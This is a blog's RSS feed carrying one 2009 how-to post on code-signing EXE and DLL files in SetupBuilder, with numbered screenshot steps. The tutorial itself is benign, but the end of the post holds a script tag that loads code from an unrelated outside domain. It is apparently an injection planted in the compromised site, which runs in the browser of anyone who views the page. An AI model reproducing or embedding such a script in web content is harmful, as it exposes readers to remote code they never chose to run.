<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Clarion Folk &#187; How To</title>
	<atom:link href="http://clarionfolk.com/category/how-to/feed/" rel="self" type="application/rss+xml" />
	<link>http://clarionfolk.com</link>
	<description>Making Development Better Than Eating Icecream</description>
	<lastBuildDate>Fri, 23 Apr 2010 04:18:35 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Code-Signing Your Own Exes/DLLs in SetupBuilder</title>
		<link>http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/</link>
		<comments>http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/#comments</comments>
		<pubDate>Wed, 14 Jan 2009 13:34:56 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[How To]]></category>
		<category><![CDATA[certificate]]></category>
		<category><![CDATA[code signing]]></category>
		<category><![CDATA[setup builder]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/</guid>
		<description><![CDATA[In a discussion on the Skype Clarion channel just now, Wolfgang asked me to post how to Code-Sign your own Exes/DLLs in SetupBuilder.
Saddle up.

1. I’ve got my Certificate information in the “General Information” window.
&#160;
Now I just want to sign my own files. Of which there are two. An EXE and a DLL.
2. So I go [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>In a discussion on the Skype Clarion channel just now, Wolfgang asked me to post how to Code-Sign your own Exes/DLLs in <a href="http://www.setupbuilder.com" target="_blank">SetupBuilder</a>.</p>
<p>Saddle up.</p>
</blockquote>
<p><strong>1. I’ve got my Certificate information in the “General Information” window.</strong></p>
<p><img title="codesign-001" style="border-right: 0px; border-top: 0px; display: inline; margin-left: 0px; border-left: 0px; margin-right: 0px; border-bottom: 0px" height="170" alt="codesign-001" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign001.png" width="401" border="0" />&#160;</p>
<p>Now I just want to sign my own files. Of which there are two. An EXE and a DLL.</p>
<p><strong>2. So I go to the Script Editor.</strong></p>
<p><img title="Code Sign #2" style="border-right: 0px; border-top: 0px; display: inline; margin-left: 0px; border-left: 0px; margin-right: 0px; border-bottom: 0px" height="290" alt="Code Sign #2" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign002.png" width="275" border="0" />&#160;</p>
<p><strong>3. Just above the “Features” line, get a couple of blank lines going on.</strong></p>
<p><img title="codesign-003" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="115" alt="codesign-003" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign003.png" width="304" border="0" /> </p>
<p>I haven’t experimented past “just get it working”, so there are probably a bunch of different places you could do this.</p>
<p><strong>4. Make sure the line is selected.</strong></p>
<p><img title="codesign-004" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="101" alt="codesign-004" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign004.png" width="326" border="0" /> </p>
<p><strong>5. Double-click on the “#embed Vista manifest…” Compiler Directive Script Function in the top right-hand corner of SB.</strong></p>
<p><img title="codesign-005" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="254" alt="codesign-005" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign005.png" width="247" border="0" /> </p>
<p><strong>6. As follows after the image:</strong></p>
<p><img title="codesign-006" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="360" alt="codesign-006" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign006.png" width="494" border="0" />&#160;</p>
<p>(a) Add your filename.</p>
<p>(b) Fill out the Name and Description.</p>
<p>(c) Check these two.</p>
<p><strong>7. Double-click on the “#code-sign application” Compiler Directive Script Function in the top right-hand corner of SB.</strong></p>
<p><img title="codesign-007" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="273" alt="codesign-007" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign007.png" width="360" border="0" /> </p>
<p><strong>8. As follows after the image:</strong></p>
</p>
<p>&#160;<img title="codesign-008" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="521" alt="codesign-008" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign008.png" width="490" border="0" /> </p>
</p>
</p>
<p>(a) Add your filename.</p>
<p>(b) Put in a Description</p>
<p>(c) These should be defaulted, if you’ve got the same as me in 1.</p>
<p>(d) Definitely stick this in :)</p>
<p>(e) Check these two.</p>
<p><strong>9. Compile</strong></p>
<p>And there you have it. That’s all I did to get this working. </p>
<p>When you compile, the little “password” appear. SB will fill in the password if you’ve entered it. See (d) directly above.</p>
<p>Hope this has been helpful for Folk.</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
